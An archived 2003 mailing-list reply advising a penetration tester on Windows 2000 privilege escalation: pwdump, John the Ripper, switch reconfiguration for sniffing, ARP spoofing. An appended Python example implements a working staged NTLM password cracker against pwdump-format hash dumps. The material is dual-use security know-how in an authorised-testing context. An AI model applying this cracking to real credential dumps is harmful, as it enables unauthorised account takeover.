Re: penetration test in a Windows 2000/NT network

From: Anders Thulin (Anders.Thulinat_private)
Date: Mon May 26 2003 - 23:43:06 PDT

    heron heron wrote:
    
    > Is there a possibility on a Windows 2000 computer (physical access is possible)
    > to attain admin rights without overwriting the admin account? Background: I
    > would like to try to crack the password of the local admin (e.g. by means of pwdump
    > and John). There is the possibility that all admin passwords (also for the
    > domain) are alike.
    
       Get a copy of Hacking Exposed Windows 2000, and study it, if you haven't
    already.
    
       Don't get stuck on getting admin rights if user rights will do. If
    the network happens to be switched, it may prove better to break into and
    reconfigure a switch to give you all traffic for sniffing than to do ARP
    spoofing.
    
       Look for the easy ways first. It may be that you don't have to do
    anything beyond cracking a user account, mounting a local share using
    those credentials, and then trying pwdump3/L0phtCrack. If the system isn't
    well configured, you've won already. Or it may be that Personal Web Server
    is the way to do it. Or that the AD is wide open.
    
       Unless you have a *good* password dictionary, plan for a week of
    cracking time, if you can. (Ordinary dictionaries are seldom useful
    for password cracking -- generating specialized dictionaries is often
    better.) L0phtCrack is still hopeless for serious dictionary attacks
    (unless it changed since LC4 was released) -- try John the Ripper instead:
    at least you can script an attack starting from small dictionaries and
    simple guesses to larger dictionaries and more complex guesses, interleaved
    with incremental-mode guessing.
    
    > A further possibility to come to information would be the employment of an
    > SMB proxy. By ARP spoofing it would nevertheless theoretically be possible to
    > intercept the LM/NTLM(v1/v2) authentication. Then the attacker could announce
    > itself to the server instead. Is there already such a tool?
    
       You are temporarily given the right to break into a network. What
    responsibility goes with that right? Is there anything that *must*not*happen*
    (such as people panicking because they have found an intruder in their
    system)? Make sure you know before you start. If DoS is a no-no, be careful
    with attacks that may disrupt network traffic -- make sure you know them well
    before you deploy them. Show time is not a good time to test out new and
    unfamiliar tools.
    
    -- 
    Anders Thulin   anders.thulinat_private   040-661 50 63
    Ki Consulting AB, Box 85, SE-201 20 Malmö, Sweden
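The staged cracking order Anders describes above (small dictionary and simple guesses first, then larger dictionaries, then incremental guessing), as an added illustration that is not code from the original message nor from John the Ripper, pwdump or L0phtCrack. It is a Python toy: MD4 is implemented inline so NT hashes from pwdump-style lines can be checked offline; the pwdump lines, account names, dictionaries and "rules" are constructed for the example. LM hashes (DES-based, and what pwdump also returns on Windows 2000 unless LM storage is disabled) are not handled here. Because NT hashes are unsalted, accounts sharing a password share a hash and fall together, which is the "all admin passwords are alike" case the question hopes for.

```python
"""Staged NTLM cracking against pwdump-style output (added toy example)."""
import itertools
import string
import struct

_M = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python (slow, but fine for a demonstration)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    rounds = (  # (function, additive constant, shifts, word order)
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i in range(16):
                a = _lrot((a + fn(b, c, d) + x[order[i]] + k) & _M, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate roles: A, D, C, B are updated in turn
        a, b, c, d = (a + aa) & _M, (b + bb) & _M, (c + cc) & _M, (d + dd) & _M
    return struct.pack("<4I", a, b, c, d)


def ntlm_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(lines):
    """pwdump format 'user:rid:LMhash:NThash:::' -> {nt_hash: [users]}."""
    by_hash = {}
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[3]:
            by_hash.setdefault(parts[3].lower(), []).append(parts[0])
    return by_hash


def mangle(word):
    """A few simple rules: case variants, trailing '!', trailing 0-99."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        yield base + "!"
        for n in range(100):
            yield base + str(n)


def incremental(alphabet, max_len):
    """Exhaustive guesses, shortest first (john's incremental mode in spirit)."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            yield "".join(tup)


def crack(pwdump_lines, small_dict, large_dict, max_len=3):
    """Run the stages in order; return {user: (password, stage that found it)}."""
    remaining = parse_pwdump(pwdump_lines)
    found = {}
    stages = [
        ("small dictionary", lambda: iter(small_dict)),
        ("small dictionary + rules", lambda: (m for w in small_dict for m in mangle(w))),
        ("large dictionary", lambda: iter(large_dict)),
        ("large dictionary + rules", lambda: (m for w in large_dict for m in mangle(w))),
        ("incremental a-z <= %d" % max_len, lambda: incremental(string.ascii_lowercase, max_len)),
    ]
    for name, candidates in stages:
        if not remaining:
            break
        for cand in candidates():
            users = remaining.pop(ntlm_hash(cand), None)  # same hash => same password
            if users:
                for u in users:
                    found[u] = (cand, name)
                if not remaining:
                    break
    return found


# Constructed sample. LM field is the well-known "no LM hash stored" value;
# the Administrator NT hash is the known hash of "password", the others are
# computed here so the sample stays self-consistent.
_NOLM = "aad3b435b51404eeaad3b435b51404ee"
SAMPLE_PWDUMP = [
    "Administrator:500:%s:8846f7eaee8fb117ad06bdd830b7586c:::" % _NOLM,
    "backup_admin:1100:%s:8846f7eaee8fb117ad06bdd830b7586c:::" % _NOLM,
    "svc_backup:1001:%s:%s:::" % (_NOLM, ntlm_hash("Summer99")),
    "jsmith:1002:%s:%s:::" % (_NOLM, ntlm_hash("qwerty")),
    "Guest:501:%s:%s:::" % (_NOLM, ntlm_hash("xyz")),
    "cfo:1003:%s:%s:::" % (_NOLM, ntlm_hash("Tr0ub4dor&3")),
]
SMALL_DICT = ["password", "summer", "admin"]
LARGE_DICT = ["letmein", "welcome", "qwerty", "dragon"]

if __name__ == "__main__":
    for user, (pw, stage) in crack(SAMPLE_PWDUMP, SMALL_DICT, LARGE_DICT).items():
        print("%-14s %-12s (%s)" % (user, pw, stage))
```

The cheap stages run to exhaustion before the expensive one starts, and a hash is removed from the work list the moment it falls, so the incremental stage only ever runs over what the dictionaries could not break. Against real pwdump output you would feed john the hash file directly; this toy exists only to make the ordering and the "identical hash, identical password" effect visible.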
    
    